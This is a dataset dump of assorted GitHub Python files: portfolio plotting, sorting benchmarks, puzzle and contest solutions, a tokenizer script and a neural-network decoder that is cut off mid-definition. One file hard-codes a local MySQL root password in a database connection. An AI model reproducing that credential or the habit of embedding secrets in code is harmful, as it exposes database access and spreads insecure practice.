seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
33305365959 | # -*- coding: utf-8 -*-
"""
Created on Sun Jan 5 18:07:08 2020
@author: MichaelSchwarz
Evaluate a portfolio's exposure after different categorizations
"""
def evaluate_portfolio_exposure(FilterCompanies="all", CategoryType="GICS", DrilldownLevel=1):
    """Fetch the chosen companies with their categorisations from MySQL,
    attach last closing prices and return a pie chart of the exposure.

    In:
    FilterCompanies -- restrict to a company group ("all" or "CurrentPortfolio")
    CategoryType -- the main categorisation scheme ("GICS", "MSHN", "MSRC", "MSSC")
    DrilldownLevel -- granularity of the categorisation, 1..5

    Returns:
    A plotly Figure with the portfolio pie chart.
    """
    import sys
    sys.path.append(r'C:\Users\MichaelSchwarz\PycharmProjects\FinanceProjects')
    # Input validation. The original `x in str([...])` matched substrings
    # (e.g. "al" would pass) -- use real membership tests instead.
    assert FilterCompanies in ("all", "CurrentPortfolio")
    assert CategoryType in ("GICS", "MSHN", "MSRC", "MSSC")
    assert DrilldownLevel in range(1, 6)
    import MyFuncGeneral as My
    cnx = My.cnx_mysqldb('fuyu')
    # NOTE(review): both branches of the original if/else built the exact
    # same query, so FilterCompanies had no effect; the duplicate branch is
    # collapsed here. CategoryType/DrilldownLevel are still unused -- TODO:
    # build the query from them once the intended SQL is known.
    query = "select * from vcurrentportfolio p " + \
            "inner join vexposurevalues_per_parent_cluster_and_issuer e on p.IssueID=e.IssuerID " + \
            "where e.ParentClusterlevel=1 and p.unitsOwned<>0"
    import pandas as pd
    comp_with_cat = pd.read_sql(query, con=cnx)
    comp_with_cat['last_price'] = pd.Series(None, index=comp_with_cat.index)
    # Attach the last closing price per row (the original reused the name
    # `px` here, shadowing the plotly alias imported below).
    for i in range(0, len(comp_with_cat)):
        comp_with_cat.loc[i, 'last_price'] = My.get_last_close(comp_with_cat.loc[i, 'Ticker_yahoo'])
    comp_with_cat['InvAmount'] = comp_with_cat.last_price * comp_with_cat.UnitsOwned
    # Plot invested amount per ticker.
    import plotly.express as px
    fig = px.pie(comp_with_cat, values='InvAmount', names='Ticker_yahoo', title='My current Portfolio')
    import plotly.io as pio
    pio.renderers.default = 'svg'  # render statically (orca) instead of opening a browser
    return fig
# fig.write_html('first_figure.html', auto_open=True)
# return(comp_with_cat)
# example
# FilterCompanies="all"; CategoryType="GICS";DrilldownLevel=1
# d=evaluate_portfolio_exposure(FilterCompanies="all", CategoryType="MSSC",DrilldownLevel=4)
# sunburst Chart
def evaluate_clusters_in_sunburst(most_inner_cluster):
    """Plot the member counts of a cluster hierarchy as a plotly sunburst chart.

    In:
    most_inner_cluster -- cluster name passed to the stored procedure
        usp_vpy_FilterMembercountForCluster

    Returns:
    A plotly Figure with the sunburst chart.
    """
    import pandas as pd
    import plotly.express as px
    import sys
    sys.path.append('C:/Users/MichaelSchwarz/.spyder-py3/myPyCode')
    import mysql.connector
    # SECURITY(review): credentials are hard-coded; move them to a config
    # file or environment variables before sharing/deploying this code.
    connection = mysql.connector.connect(host='localhost',
                                         database='fuyu',
                                         user='root',
                                         password='mysql4michi')
    cursor = connection.cursor()
    cursor.callproc('usp_vpy_FilterMembercountForCluster', [most_inner_cluster])
    # The stored procedure returns one result set of (parent, child, members).
    results = [r.fetchall() for r in cursor.stored_results()]
    dfres = pd.DataFrame(results[0], columns=['parent', 'child', 'members'])
    fig = px.sunburst(
        dfres,
        names='child',
        parents='parent',
        values='members',
    )
    return fig
# example
#f = evaluate_clusters_in_sunburst(MostInnerCluster='MSHN')
#f
| schwarz777/FinanceProjects | PortfolioConstruction/evaluate_portfolio_exposure.py | evaluate_portfolio_exposure.py | py | 3,397 | python | en | code | 0 | github-code | 90 |
43459758035 | import os
import psutil
import tracemalloc
from collections import defaultdict
import cProfile
import time
import pandas as pd
import matplotlib.pyplot as plt
class Bucket_Sort:
    """Bucket sort for floats in [0, 1), using insertion sort per bucket."""

    def insertionSort(self, b):
        """Sort list ``b`` in place with insertion sort and return it."""
        for idx in range(1, len(b)):
            key = b[idx]
            pos = idx - 1
            # Shift larger elements one slot right until `key` fits.
            while pos >= 0 and b[pos] > key:
                b[pos + 1] = b[pos]
                pos -= 1
            b[pos + 1] = key
        return b

    def bucketSort(self, x):
        """Sort ``x`` in place by scattering into 10 buckets of width 0.1."""
        slot_num = 10  # 10 slots, each covering a 0.1-wide value range
        buckets = [[] for _ in range(slot_num)]
        # Scatter: value v in [0, 1) lands in bucket int(10 * v).
        for value in x:
            buckets[int(slot_num * value)].append(value)
        # Sort each bucket individually.
        for idx in range(slot_num):
            buckets[idx] = self.insertionSort(buckets[idx])
        # Gather: write the buckets back into x in order.
        write_at = 0
        for bucket in buckets:
            for value in bucket:
                x[write_at] = value
                write_at += 1
        return x

    def printList(self, arr):
        """Print the elements of ``arr`` space-separated on one line."""
        for value in arr:
            print(value, end=" ")
        print()
# Driver: profile one bucketSort run (time, CPU, RSS/VMS and traced heap)
# and render the collected metrics as a labelled pie chart.
if __name__ == "__main__":
    start = time.time()
    bucket_sort = Bucket_Sort()
    dictionary = defaultdict()
    # RSS and VMS used by the process
    p = psutil.Process(os.getpid())
    dictionary["rss - mb(s)"] = round(p.memory_info().rss / (1024 * 1024), 2)
    dictionary["vms - mb(s)"] = round(p.memory_info().vms / (1024 * 1024), 2)
    # CPU utilization
    dictionary["cpu_usage - %"] = p.cpu_percent()
    # memory used by the process
    tracemalloc.start()
    x = [0.20, 0.22, 0.43, 0.36, 0.39, 0.27]
    print("Sorted Array is")
    # cProfile evaluates the string in this module's globals, where
    # bucket_sort and x are defined.
    cProfile.run("bucket_sort.bucketSort(x)")
    traced_mem = tracemalloc.get_traced_memory()
    tracemalloc.stop()
    end = time.time()
    # NOTE(review): traced_mem[1] is in bytes, so /1024 yields KiB although
    # the key says "mb(s)" -- confirm which unit is intended.
    dictionary["memory_usage - mb(s)"] = round(traced_mem[1] / 1024, 2)
    dictionary["exec_time - s"] = round(end - start, 2)
    print(dictionary)
    # NOTE(review): the pie mixes metrics with different units, so slice
    # sizes are not directly comparable -- kept as-is for the assignment.
    patches, texts = plt.pie(list(dictionary.values()), radius=0.5)
    labels = [f"{i} - {j}" for i,j in zip(list(dictionary.keys()), list(dictionary.values()))]
    plt.legend(patches, labels, loc="upper right", bbox_to_anchor = (0.4, 0.2))
    plt.title("Bucket sort")
    plt.savefig("BucketSort.png")
    plt.show()
29206483838 | #Stuart- Nice start to your code, but incomplete. Where are the column names for the other two data sets?
# The code that you have for diamonds doesn't output a graph (it appears to be trying to make
# a grid of many, ~81, smaller graphs). Does your code know to skip columns that are non-numeric?
# You can get a bit over half your points back on this HW if you resubmit. You had mentioned in
# an email issues with finding the upper and lower bounds, I changed these lines to what I think you
#were looking for. Make sure to look at the objects returned by these lines to know if they are what you wanted.
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 22 19:30:15 2016
@author: verroejiba
"""
''' The crux of your challenge is to find a way to calculate a reasonable bin size
or number of bins given the scale of each numeric column and plot the distribution
using that optimal bin. In your code, you will need to test for severe outliers
that could hide the true shape of the distribution, separate that part of the data,
and plot histograms for both segments of the distribution. You will also need
to plot a boxplot of the entire distribution.'''
#Homework3
import pandas as pd
#import matplotlib.pyplot as plt
#import numpy as np
# The UCI files ship without a header row, so pass header=None and assign
# real column names (the original let read_csv eat the first data row as a
# header and then assigned an empty column list, which raises a
# length-mismatch error; `income.colummns` was also a typo).
abalone = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/abalone/abalone.data',
                      header=None)
abalone.columns = ['Sex', 'Length', 'Diameter', 'Height', 'WholeWeight',
                   'ShuckedWeight', 'VisceraWeight', 'ShellWeight', 'Rings']
income = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/adult/adult.data',
                     header=None)
income.columns = ['Age', 'Workclass', 'Fnlwgt', 'Education', 'EducationNum',
                  'MaritalStatus', 'Occupation', 'Relationship', 'Race', 'Sex',
                  'CapitalGain', 'CapitalLoss', 'HoursPerWeek', 'NativeCountry',
                  'Income']
# The diamond CSV has its own header; just rename to the course's names.
diamond = pd.read_csv('https://vincentarelbundock.github.io/Rdatasets/csv/Ecdat/Diamond.csv')
diamond.columns=['Number','Carat','Colour','Clarity','Certification','Price']
def optbin(file):
    ''' Compute the optimal histogram bin width for every numeric column
    using the Freedman-Diaconis rule:
        bin width = 2 * IQR(x) / n**(1/3)
    Parameters:
        file = DataFrame whose numeric columns are analysed
    Returns:
        pandas Series mapping each numeric column name to its bin width
    '''
    num = file.select_dtypes(include='number')  # skip non-numeric columns
    n = len(file)                               # sample size (rows)
    Q1 = num.quantile(.25)                      # first quartile per column
    Q3 = num.quantile(.75)                      # third quartile per column
    IQR = Q3 - Q1                               # interquartile range per column
    # Freedman-Diaconis rule. n is now a plain scalar: the original indexed
    # describe() with loc[['count']], which produced a DataFrame and broke
    # the arithmetic.
    bin_size = 2 * (IQR / (n ** (1 / 3)))
    return bin_size
#optbin(diamond)
def dist(file):
    '''Plot the distribution of every numeric column.

    For each numeric column the optimal bin width is computed via optbin
    (Freedman-Diaconis); severe outliers (outside Q1 - 1.5*IQR .. Q3 + 1.5*IQR)
    are split off and, when present, plotted in their own histogram so they
    do not hide the true shape of the bulk of the data. A boxplot of the
    whole column is drawn as well.
    Parameter:
        file - DataFrame to work on
    '''
    widths = optbin(file)
    num = file.select_dtypes(include='number')  # skip non-numeric columns
    for c in num.columns:
        col = num[c].dropna()
        Q1 = col.quantile(.25)
        Q3 = col.quantile(.75)
        iqr = Q3 - Q1
        lower = Q1 - 1.5 * iqr   # Tukey fences for "severe" outliers
        upper = Q3 + 1.5 * iqr
        mask = (col < lower) | (col > upper)
        bulk = col[~mask]
        outliers = col[mask]
        # hist() wants a bin *count*; convert the F-D bin *width* to one.
        width = widths[c]
        span = bulk.max() - bulk.min()
        n_bins = max(1, int(span / width)) if width > 0 else 10
        bulk.hist(bins=n_bins)            # distribution without outliers
        if not outliers.empty:
            outliers.hist()               # the outlier segment, default bins
        num.boxplot(column=c)             # boxplot of the full column
#dist(diamond)
| Verroe/Ejiba_Verro_python | Ejiba_Verro_HW3_graded.py | Ejiba_Verro_HW3_graded.py | py | 3,267 | python | en | code | 0 | github-code | 90 |
13426898110 | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 14 07:53:07 2022
@author: jgalb
"""
#taken mostly from geeksforgeeks
from sys import stdin
class beep:
    """Shortest tour over a coordinate list (Manhattan metric) solved with
    bitmask dynamic programming (Held-Karp style).

    ``cl`` is expected to start and end with the depot coordinate; the
    direct depot->end edge is blocked with the sentinel cost 401 so the
    tour is forced through the intermediate points.
    """

    def __init__(self, cl):
        self.cl = cl
        self.n = len(self.cl)
        # Pairwise Manhattan distances; 401 acts as "unreachable".
        self.dist = [[401] * self.n for _ in range(self.n)]
        for a in range(self.n):
            for b in range(self.n):
                self.dist[a][b] = self.find_dist(self.cl[a], self.cl[b])
        # Forbid travelling straight between start and final (= start) node.
        self.dist[0][self.n - 1] = 401
        self.dist[self.n - 1][0] = 401
        self.start_mask = 2 ** self.n - 1  # bitmask with every node visited
        # Memo table: min_list[mask][i] = best cost to reach node i having
        # visited exactly the nodes in mask (-1 = not yet computed).
        self.min_list = [[-1] * self.n for _ in range(self.start_mask + 1)]

    def find_dist(self, a, b):
        """Manhattan distance between points a and b (0 for equal points)."""
        if a == b:
            return 0
        return abs(a[0] - b[0]) + abs(a[1] - b[1])

    def find_min(self, mask, i):
        """Minimum cost to end at node i after visiting the nodes in mask."""
        cached = self.min_list[mask][i]
        if cached != -1:
            return cached
        # Base case: mask holds only the start node (bit 0) and node i.
        if (1 << i | 1) == mask:
            return self.dist[0][i]
        best = 400  # upper cap used by the original implementation
        for j in range(1, self.n):
            if j == i or not (mask & 1 << j):
                continue
            candidate = self.find_min(mask & ~(1 << i), j) + self.dist[j][i]
            if candidate < best:
                best = candidate
        self.min_list[mask][i] = best
        return best
if __name__ == "__main__":
    # One test case per outer iteration, read from stdin in this order:
    # an ignored line, the start coordinate, the point count, the points.
    for i in range(int(stdin.readline())):
        stdin.readline()
        cl = []
        start = [int(x) for x in stdin.readline().split()]
        cl.append(start)
        for j in range(int(stdin.readline())):
            c = [int(x) for x in stdin.readline().split()]
            cl.append(c)
        # The tour must return to the start, so append it again as end node.
        cl.append(start)
        if len(cl) == 2:
            # No intermediate points: nothing to visit, cost is 0.
            print(0)
        else:
            m = beep(cl)
            ans = m.find_min(m.start_mask, m.n-1)
            print(ans)
28437541955 | import re
from collections import namedtuple
from typing import Dict, List
# A ticket-field rule: two inclusive value ranges.
Rule = namedtuple("Rule", "min1 max1 min2 max2")
RulesDict = Dict[str, Rule]
Ticket = List[int]
TicketList = List[Ticket]


def parse_input(filename: str) -> (RulesDict, Ticket, TicketList):
    """Parse the puzzle input into (rules, my ticket, nearby tickets).

    The file has three blank-line separated sections: the field rules,
    "your ticket:" followed by one CSV line, and "nearby tickets:"
    followed by one CSV line per ticket.
    """
    with open(filename, "r") as handle:
        rules_raw, mine_raw, other_raw = handle.read().split("\n\n")

    rules = {}
    for line in rules_raw.split("\n"):
        match = re.search(r"(.*): (\d*)-(\d*) or (\d*)-(\d*)", line)
        rules[match.group(1)] = Rule(*map(int, match.groups()[1:]))

    _, mine_line = mine_raw.split("\n")
    mine = [int(v) for v in mine_line.split(",")]

    other = [[int(v) for v in line.split(",")]
             for line in other_raw.split("\n")[1:]]
    return rules, mine, other
def check_rule(rule: Rule, val: int) -> bool:
    """True if ``val`` lies in either of the rule's two inclusive ranges."""
    for low, high in ((rule.min1, rule.max1), (rule.min2, rule.max2)):
        if low <= val <= high:
            return True
    return False
def get_invalid_values_for_ticket(rules: RulesDict, ticket: Ticket) -> List[int]:
    """Return the ticket values that satisfy none of the given rules."""
    return [value for value in ticket
            if not any(check_rule(rule, value) for rule in rules.values())]
def resolve_columns(rules: RulesDict, tickets: TicketList) -> Dict[int, str]:
    """Map each ticket column index to the unique rule name it satisfies.

    Strategy: repeatedly find a column whose values satisfy exactly one of
    the remaining rules, fix that pairing and retire the rule; iterate
    until every column is resolved. Note: ``rules`` is consumed (entries
    are deleted) in the process.
    """
    num_columns = len(tickets[0])
    resolved = {}
    while len(resolved) < num_columns:
        for idx in range(num_columns):
            if idx in resolved:
                # this column is already paired with a rule
                continue
            column = [ticket[idx] for ticket in tickets]
            candidates = [name for name, rule in rules.items()
                          if all(check_rule(rule, value) for value in column)]
            if len(candidates) == 1:
                resolved[idx] = candidates[0]
                # this rule is taken -- remove it from further consideration
                del rules[candidates[0]]
    return resolved
def first(rules: RulesDict, other: TicketList) -> int:
    """Part 1: sum of all values on nearby tickets matching no rule."""
    return sum(sum(get_invalid_values_for_ticket(rules, ticket))
               for ticket in other)
def second(rules: RulesDict, mine: Ticket, other: TicketList) -> int:
    """Part 2: product of my ticket's values in the 'departure*' columns."""
    # Keep only tickets where every value satisfies at least one rule.
    valid_other = [ticket for ticket in other
                   if not get_invalid_values_for_ticket(rules, ticket)]
    columns_map = resolve_columns(rules, valid_other)
    product = 1
    for column_idx, value in enumerate(mine):
        if "departure" in columns_map[column_idx]:
            product *= value
    return product
def main():
    # Solve both parts of AoC 2020 day 16 and print the answers.
    rules, mine, other = parse_input("inputs/day16.txt")
    print(first(rules, other))
    # NOTE: second() consumes the rules dict (resolve_columns deletes
    # entries), so it must run after first().
    print(second(rules, mine, other))
if __name__ == "__main__":
    main()
| aboutroots/AoC2020 | day16.py | day16.py | py | 3,106 | python | en | code | 0 | github-code | 90 |
19254261095 | from sys import stdin
from collections import deque
# 4-neighbour moves for the "monkey" and the 8 chess-knight moves.
moving_monkey = [[1, 0], [-1, 0], [0, 1], [0, -1]]
moving_horse = [[-2, 1], [-1, 2], [1, 2], [2, 1], [2, -1], [1, -2], [-1, -2], [-2, -1]]
# NOTE(review): rebinds the imported `stdin` to a local file so the same
# readline() calls work for local testing.
stdin = open("./input.txt", "r")
k = int(stdin.readline())                       # max knight moves allowed
cols, rows = map(int, stdin.readline().split())  # grid width, then height
grid = []
for _ in range(rows):
    grid.append(stdin.readline().split())        # "0" = open, non-"0" = blocked
# visited[h][r][c]: cell (r, c) reached with h knight moves already used.
visited = [[[False] * cols for _ in range(rows)] for _ in range(k + 1)]
def bfs():
    """Level-order BFS over (row, col, knight-moves-used) states.

    Returns the minimum number of moves from (0, 0) to the bottom-right
    cell using at most k knight moves, or -2 when it is unreachable
    (the caller translates -2 to -1 for output). Relies on the
    module-level grid/visited/k globals set up above.
    """
    queue = deque()
    queue.append((0, 0, 0))
    visited[0][0][0] = True
    distance = -1
    while queue:
        # Process one BFS level at a time so `distance` counts moves.
        size = len(queue)
        distance += 1
        for _ in range(size):
            cur_row, cur_col, horse_count = queue.popleft()
            # print(cur_row, cur_col, horse_count)
            if cur_row == rows - 1 and cur_col == cols - 1:
                return distance
            # Plain 4-direction steps (do not consume a knight move).
            for monkey_row, monkey_col in moving_monkey:
                next_row = cur_row + monkey_row
                next_col = cur_col + monkey_col
                if 0 <= next_row < rows and 0 <= next_col < cols:
                    if not visited[horse_count][next_row][next_col] and grid[next_row][next_col] == "0":
                        queue.append((next_row, next_col, horse_count))
                        visited[horse_count][next_row][next_col] = True
            # Knight jumps, only while the budget k is not exhausted.
            if horse_count < k:
                for horse_row, horse_col in moving_horse:
                    next_row = cur_row + horse_row
                    next_col = cur_col + horse_col
                    if 0 <= next_row < rows and 0 <= next_col < cols:
                        if not visited[horse_count + 1][next_row][next_col] and grid[next_row][next_col] == "0":
                            queue.append((next_row, next_col, horse_count + 1))
                            visited[horse_count + 1][next_row][next_col] = True
    # Queue exhausted without reaching the goal.
    return -2
def main():
    # Print the minimum number of moves, or -1 when the goal is unreachable.
    distance = bfs()
    print(-1 if distance == -2 else distance)
if __name__ == '__main__':
    main()
30876008126 | # BOJ_27211_gold5-도넛행성
import sys
from collections import deque
input = sys.stdin.readline
# Row/column deltas for the four neighbours (up, down, left, right).
dr = [-1, 1, 0, 0]
dc = [ 0, 0,-1, 1]
# Wrap-around boundary helper -- superseded by the modulo arithmetic
# inside bfs() below (the grid is a torus, indices wrap both ways).
# def boundary(rc, num):
#     if rc == 1: # rc 가 1이면 row
#         if num == -1:
#             return num + N
#         return num % N
#     else: # rc 가 2이면 column
#         if num == -1:
#             return num + M
#         return num % M
def bfs():
    """Count connected components of open (non-forest) cells on the torus.

    Pops unvisited open cells from the module-level `zero_set`, flood-fills
    each component with BFS (row/column indices wrap modulo N/M because the
    planet is a donut) and returns the number of components found.
    """
    cnt = 0
    que = deque()
    visited = set()
    while zero_set:
        # Any cell still in zero_set starts a new, unreached component.
        cnt += 1
        r, c = zero_set.pop()
        que.append((r, c))
        visited.add((r, c))
        while que:
            r, c = que.popleft()
            for i in range(4):
                # nr = boundary(1, dr[i] + r)
                # nc = boundary(2, dc[i] + c)
                nr = (dr[i] + r) % N
                nc = (dc[i] + c) % M
                if 0 <= nr < N and 0 <= nc < M and (nr, nc) not in visited:
                    if not map1[nr][nc]:  # enqueue only open cells (0 = not forest)
                        que.append((nr, nc))
                        zero_set.discard((nr, nc))
                        visited.add((nr, nc))
    return cnt
N, M = map(int, input().split())  # grid height (N) and width (M)
map1 = []
zero_set = set()  # coordinates of all open (0) cells, consumed by bfs()
for i in range(N):
    map1.append(list(map(int, input().split())))
    for j, e in enumerate(map1[i]):
        if e == 0:
            zero_set.add((i, j))
print(bfs())
70332876778 | import os.path
import sys
import math
def get_tx_ax(tmp):
    """Split a temperature around 273 into a [below, above] offset pair.

    Returns [0, tmp - 273] when tmp is above 273 and [273 - tmp, 0]
    otherwise, so at most one side of the pair is non-zero.
    """
    delta = tmp - 273
    if delta > 0:
        return [0, delta]
    return [-delta, 0]
def mov_ptr(target, ptr, arr):
    """Walk ``ptr`` through sorted ``arr`` until arr[ptr] == target.

    Returns (moves, new_ptr), where moves is a string of '>' (right) or
    '<' (left) characters describing the pointer movement. Assumes
    ``target`` is present in ``arr``.
    """
    steps = 0
    while arr[ptr] != target:
        if target < arr[ptr]:
            ptr -= 1
            steps -= 1
        else:
            ptr += 1
            steps += 1
    symbol = ">" if steps > 0 else "<"
    return symbol * abs(steps), ptr
# Driver: compile a recipe file (MOVE/TEMP/ISOLATE commands) into a
# ChemiCompiler program string, track simulated beaker contents, and
# print per-beaker reagent totals plus how many times the recipe fits
# into 100 units.
if __name__ == "__main__":
    filename = ""
    # Prompt until an existing file is named.
    while True:
        print("Enter the filename:")
        filename = input()
        if os.path.isfile(filename):
            break
        print("Not a file, try again")
    commands = []
    # Register-set opcodes for the first three numeric operands.
    reg_ops = ['}', ')', "'"]
    # Final opcode emitted per command, keyed by the command verb.
    main_ops = {
        'MOVE': '@',
        'TEMP': "$",
        'ISOLATE': '#'
    }
    all_ints = set()
    with open(filename, 'r') as file:
        for line in file.readlines():
            commands.append(line[:-1].split())
    # print(commands)
    # Normalise each command: expand TEMP's temperature into the two
    # offsets, move the verb to the end, convert operands to int and
    # collect every distinct operand value.
    for i in range(len(commands)):
        if commands[i][0] == 'TEMP':
            tmp = int(commands[i].pop())
            commands[i].extend(get_tx_ax(tmp))
        commands[i].append(commands[i].pop(0))
        for j in range(len(commands[i]) - 1):
            commands[i][j] = int(commands[i][j])
            all_ints.add(commands[i][j])
    all_ints = sorted(list(all_ints))
    # print(commands)
    # print(all_ints)
    # The tape is initialised with every distinct value in ascending
    # order; the pointer starts on the last (largest) cell.
    ptr = len(all_ints) - 1
    init_str = ">".join(["+" * i for i in all_ints])
    regs = [-1, -1, -1]
    # print(ptr)
    # print(init_str)
    # all_beakers[b] tracks the simulated reagent amounts in beaker b+1;
    # extra list slots appear when ISOLATE splits out reagents.
    all_beakers = [[0] for i in range(10)]
    # print(all_beakers)
    chem_fuck_program = [init_str]
    for command in commands:
        string = ""
        for i in range(len(command) - 1):
            # if the register has already been set to the desired value
            if i < len(reg_ops) and regs[i] == command[i]:
                continue
            # Shift the ptr, then set the register
            shift, ptr = mov_ptr(command[i], ptr, all_ints)
            string += shift
            if i < len(reg_ops):
                regs[i] = command[i]
                string += reg_ops[i]
        string += main_ops[command[-1]]
        # Simulate the beaker bookkeeping (only beakers 1..10 tracked).
        if command[-1] == 'MOVE' and command[1] <= 10:
            all_beakers[command[0] - 1][0] += command[2]
            all_beakers[command[1] - 1][0] -= command[2]
            if len(all_beakers[command[0] - 1]) > 1:
                print("MOVE from beaker " + str(command[0]) + " with multiple reagents")
        elif command[-1] == 'ISOLATE' and command[1] <= 10:
            all_beakers[command[1] - 1][0] -= command[2]
            while len(all_beakers[command[0] - 1]) < command[3]:
                all_beakers[command[0] - 1].append(0)
            all_beakers[command[0] - 1][command[3] - 1] += command[2]
        chem_fuck_program.append(string)
    chem_fuck_program.append("~")
    for line in chem_fuck_program:
        print(line)
    # print(all_beakers)
    # Drop beakers that ended up empty (iterate backwards so pops are safe).
    i = len(all_beakers) - 1
    while i >= 0:
        if sum(all_beakers[i]) <= 0:
            all_beakers.pop(i)
        i -= 1
    # How many whole recipes fit into a 100-unit beaker.
    min_reps = sys.maxsize
    for beaker in all_beakers:
        if 100 / sum(beaker) < min_reps:
            min_reps = math.floor(100 / sum(beaker))
    print("\nCan make recipe " + str(min_reps) + " times.")
    # Report per-beaker amounts: once per recipe, and the totals for
    # min_reps repetitions over the chosen beaker size (50 or 100).
    once = []
    total = []
    for i in range(len(all_beakers)):
        # string = "Beaker " + str(i + 1) + ": "
        beaker_size = 50 if sum(all_beakers[i]) * min_reps <= 50 else 100
        once_str = "+".join([str(i) for i in all_beakers[i]])
        total_str = "+".join([str(i * min_reps) for i in all_beakers[i]])
        once.append(once_str)
        total.append(total_str + "/" + str(beaker_size))
        string = once_str + " " + total_str + "/" + str(beaker_size)
        print(string)
    print()
    for i in once:
        print(i)
    print()
    for i in total:
        print(i)
    # print(min_reps)
    #
| Bobtron/SpaceStation13Tools | ChemiCompilerCompiler/Standard/Driver.py | Driver.py | py | 3,871 | python | en | code | 0 | github-code | 90 |
18565110149 |
def main():
    """Read N and N scores; Alice and Bob alternately take the largest
    remaining score (Alice first). Print Alice's total minus Bob's."""
    n = int(input())
    scores = sorted(map(int, input().split()), reverse=True)  # descending
    # In descending order Alice gets the even indices, Bob the odd ones.
    alice_total = sum(scores[i] for i in range(0, n, 2))
    bob_total = sum(scores[i] for i in range(1, n, 2))
    print(alice_total - bob_total)


if __name__ == "__main__":
    main()
| Aasthaengg/IBMdataset | Python_codes/p03434/s648589478.py | s648589478.py | py | 317 | python | en | code | 0 | github-code | 90 |
40808682485 | from transformers import AutoTokenizer
from tqdm import tqdm
import pandas as pd
import argparse
MAX_LENGTH=512  # NOTE(review): defined but never used in this script
parser = argparse.ArgumentParser(description='Tokenize para')
parser.add_argument('--data-a', type=str, required=True, help='one of the parallel data')
parser.add_argument('--data-b', type=str, required=True, help='another one of the parallel data')
parser.add_argument('--save-path', type=str, required=True, help='save path')
args = parser.parse_args()
# NOTE(review): unreachable -- argparse already exits when a required
# argument is missing, so data_a/data_b are always set at this point.
if not args.data_a or not args.data_b:
    print('Please input the data path')
    exit()
def xml_tok(data,fout):
    """Tokenize each item of ``data`` with the XLM-R subword tokenizer and
    write one space-joined token line per item to the file path ``fout``.

    NOTE(review): the caller passes (sentence_a, sentence_b) tuples, so
    ``line`` is a tuple here, not a string -- confirm the tokenizer handles
    that as intended rather than tokenizing each side separately.
    """
    fout = open(fout, 'w', encoding='utf-8')
    # XLM-RoBERTa SentencePiece tokenizer (downloaded on first use).
    tok = AutoTokenizer.from_pretrained("xlm-roberta-base")
    for line in tqdm(data):
        word_pieces = tok.tokenize(line,add_special_tokens=True)
        new_line = " ".join(word_pieces)
        fout.write('{}\n'.format(new_line))
    fout.close()
# Side a: strip all spaces (pre-segmented text) and trailing newlines.
with open(args.data_a, 'r', encoding='utf-8') as f:
    data_a = [ line.replace(" ","").replace('\n','') for line in f.readlines()]
# Side b: keep spaces, strip newlines only.
with open(args.data_b, 'r', encoding='utf-8') as f:
    data_b = [ line.replace('\n','') for line in f.readlines()]
# The two files must be line-aligned parallel corpora.
assert len(data_a) == len(data_b)
data = list(zip(data_a,data_b))
xml_tok(data,args.save_path+'/processed.spm.all')
print("+++++++++done+++++++++")
| jazzisfuture/FineTuningXLM-R | script/tokenize_para.py | tokenize_para.py | py | 1,284 | python | en | code | 0 | github-code | 90 |
19143610635 | # Given a binary number ,find out its decimal representation. For eg 000111 in binary is 7 in decimal. Input Format
# The first line contains N, the number of binary numbers. Each of the next N lines contains one binary representation of a number.
# Output Format
# N lines,each containing a decimal equivalent of the binary number.
# Sample Input
# 4
# 101
# 1111
# 00110
# 111111
# Sample output
# 5
# 15
# 6
# 63
# Read N binary strings, then print the decimal value of each one.
noOfTestCases=int(input("Enter the number of Test cases: "))
a=[]
for i in range(noOfTestCases):
    a.insert(i,(input("")))
for value in a:
    # int(s, 2) parses a binary string directly (leading zeros included),
    # replacing the manual digit-by-digit powers-of-two accumulation.
    print(int(value, 2))
| AasthaMehtaTech/DSA_Team12_Uplift_Project | Loops_Patterns_Print/InputOutput/RishabhVerma/Day2/P5.py | P5.py | py | 842 | python | en | code | 23 | github-code | 90 |
31722594168 | import math
import numpy as np
import torch
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
import sys
sys.path.append("../")
from utils.pos_embed import get_2d_sincos_pos_embed
def conv3x3(in_planes, out_planes, stride=1):
    """Bias-free 3x3 convolution with padding 1 (spatial size preserved
    when stride == 1)."""
    return nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        padding=1,
        bias=False,
    )
class BasicBlock(nn.Module):
    """Standard two-convolution ResNet basic block with a residual shortcut."""
    expansion = 1

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(BasicBlock, self).__init__()
        # Submodule creation order matches the reference implementation so
        # parameter initialisation consumes the RNG identically.
        self.conv1 = conv3x3(inplanes, planes, stride)
        self.bn1 = nn.BatchNorm2d(planes)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = conv3x3(planes, planes)
        self.bn2 = nn.BatchNorm2d(planes)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        # Shortcut branch: identity, or a projection when shapes differ.
        identity = x if self.downsample is None else self.downsample(x)
        out = self.relu(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        return self.relu(out + identity)
class Decoder(nn.Module):
    """Five-stage upsampling decoder mapping a (planes, H, W) feature map to
    a 3-channel image at 32x the input resolution (e.g. 7x7 -> 224x224).

    ``mlp_ratio`` is accepted for interface compatibility but not used.
    """

    def __init__(self, planes, mlp_ratio=4):
        super(Decoder, self).__init__()

        def upsample_stage(in_ch, out_ch):
            # 2x bilinear upsample followed by conv + BN + ReLU.
            return nn.Sequential(
                nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),
                nn.Conv2d(in_ch, out_ch, kernel_size=3, padding=1, bias=False),
                nn.BatchNorm2d(out_ch),
                nn.ReLU(inplace=True),
            )

        # Stage comments give the spatial size for a 7x7 input.
        self.tconv1 = upsample_stage(planes, planes // 2)        # 14 x 14
        self.tconv2 = upsample_stage(planes // 2, planes // 4)   # 28 x 28
        self.tconv3 = upsample_stage(planes // 4, planes // 8)   # 56 x 56
        self.tconv4 = upsample_stage(planes // 8, planes // 16)  # 112 x 112
        # Final stage projects to 3 (RGB) channels with bias, no BN/ReLU.
        self.tconv5 = nn.Sequential(
